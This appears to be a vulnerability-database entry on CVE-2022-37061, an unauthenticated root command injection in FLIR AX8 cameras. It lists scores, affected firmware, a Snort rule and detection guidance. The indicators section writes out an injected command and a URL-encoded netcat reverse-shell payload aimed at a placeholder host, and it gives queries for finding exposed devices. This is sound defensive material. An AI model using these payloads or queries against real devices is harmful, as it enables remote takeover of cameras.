cbcvebase.
CVE-2022-37061
published 2022-08-18

CVE-2022-37061: All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute…

PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
99.62%
99.9th percentile
All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16.

Affected

1 ranges
VendorProductVersion rangeFixed in
flirflir_ax8_firmware<= 1.46.16

Detection & IOCsextracted from sources · hover to see the quote

url/res.php
commandaction=alarm&id=2;id
commandaction=alarm&id=2;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff
path/login/dologin
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:8; content:"/res.php"; fast_pattern; http.request_body; content:"action|3d|alarm"; content:"id|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.cve.org/CVERecord?id=CVE-2022-37061; reference:cve,2022-37061; classtype:attempted-admin; sid:2065895; rev:1; metadata:affected_product FLIR, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_24, cve CVE_2022_37061, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_24, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
regex: 'uid=([0-9(a-z)]+)' AND 'gid=([0-9(a-z)]+)' AND 'visualBeep' in HTTP response body
  • Look for HTTP POST requests to /res.php with a body containing 'action=alarm' and an 'id' parameter value that includes shell metacharacters (;, |, `, $, newline) — this is the injection point for CVE-2022-37061.
  • The Emerging Threats Snort rule (sid:2065895) fires on POST /res.php with body matching 'action=alarm' and 'id=' followed by shell injection metacharacters via PCRE: /^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R
  • Successful exploitation produces a response body containing both 'uid=' and 'gid=' output (from the injected 'id' OS command) alongside the string 'visualBeep' from the normal alarm response — use this combination to confirm exploitation.
  • The exploit is unauthenticated — no prior login session is required to reach /res.php and inject commands. Monitor for POST requests to /res.php from unauthenticated sources.
  • Shodan/FOFA exposure queries for vulnerable devices: Shodan title:"FLIR", FOFA app="FLIR-AX8" — use these to identify internet-exposed instances.
  • The reverse shell payload uses the classic mkfifo+netcat pattern URL-encoded in the id parameter: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f — watch for this pattern in POST body or process trees on the device.
  • The Metasploit module for this CVE uploads and executes a payload to gain root — look for unexpected file writes or process spawns from the web server process on FLIR AX8 devices.
  • ·The vulnerability is only present in FLIR AX8 firmware versions up to and including 1.46.16. Firmware 1.49.16 (Jan 2023) and later are not affected.
  • ·The ET Snort rule (sid:2065895) is scoped to plaintext HTTP traffic only (tls_state plaintext) — encrypted HTTPS traffic to the device will not be detected by this rule.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.